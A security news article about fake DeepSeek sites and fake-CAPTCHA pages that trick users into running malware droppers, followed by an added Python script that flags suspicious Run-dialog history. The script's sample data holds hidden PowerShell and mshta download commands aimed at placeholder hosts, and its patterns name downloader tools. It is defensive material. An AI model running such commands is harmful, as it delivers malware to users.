• McAfee’s researchers find a “cocktail” of malware hiding behind fake DeepSeek apps
• The campaign preys on people searching for the generative AI tool
• Infostealers, crypto miners, and more are being deployed this way

The hype around DeepSeek is the next big thing cybercriminals are exploiting in their hacking campaigns, researchers from McAfee Labs are saying.

The team has outlined how they saw cybercriminals setting up various websites offering different versions of DeepSeek for download. Victims would reach these websites through search engines, meaning that some SEO poisoning was involved in the campaign as well.

When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers, to coin miners. These malware variants can steal sensitive information (including banking credentials and cryptocurrency wallet information), and can force the infected computer to mine cryptocurrency, rendering it useless for pretty much anything else.


Fake CAPTCHA

On some websites, victims are invited to download a DeepSeek app or program; on others, the devil is in the CAPTCHA.

In some cases observed by McAfee, victims would visit a website with a CAPTCHA that can be “solved” by copying and pasting a command into the Run program on Windows. This command just downloads and runs a malware dropper.

To stay safe, you should stay vigilant at all times. Instead of “googling” for something, visit the website directly, and if you don’t know the address, scrutinize every link returned by the search engine.

Furthermore, a real CAPTCHA will never ask you to paste a command into the Run program.
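
For responders checking whether a user followed such a fake CAPTCHA, Windows keeps commands entered in the Run dialog under the per-user RunMRU registry key. The following is an added example, not code from McAfee or the original article: it parses a constructed export of those values and flags entries using assumed heuristics (a script host or download utility combined with a URL or hidden/encoded flags).

```python
import re

# Constructed sample of the values under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Each entry ends in "\1"; MRUList gives the order, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://example.invalid/captcha-check\\1",
    "d": "powershell -w hidden -enc PLACEHOLDER\\1",
}

# Assumed heuristics, not indicators taken from the McAfee report.
INDICATORS = {
    "script host or downloader": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin|msiexec)(\.exe)?\b", re.I),
    "remote URL": re.compile(r"https?://", re.I),
    "hidden or encoded": re.compile(r"-w\w*\s+h|-enc|\biex\b|invoke-expression", re.I),
}


def run_history(values):
    """Return Run-dialog commands, most recent first, without the "\\1" suffix."""
    commands = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def findings(values):
    """Flag commands that start a script host or downloader AND show a second indicator."""
    flagged = []
    for cmd in run_history(values):
        reasons = [label for label, rx in INDICATORS.items() if rx.search(cmd)]
        if "script host or downloader" in reasons and len(reasons) > 1:
            flagged.append((cmd, reasons))
    return flagged


if __name__ == "__main__":
    for cmd, reasons in findings(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {cmd}  [{', '.join(reasons)}]")
```

A bare `cmd` or `notepad` entry is not flagged, since many users launch those from the Run dialog legitimately.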

Hackers are known for tapping into current trends to distribute malware. Similar campaigns were observed when ChatGPT was first released, both for Windows and Android.

Major events, such as Black Friday and Cyber Monday, the Olympic Games, the World Cup, and others, have all been abused in the past. The Covid-19 outbreak, the Russo-Ukrainian war, and the US presidential elections all served as platforms for information theft, malware distribution, and wire fraud.
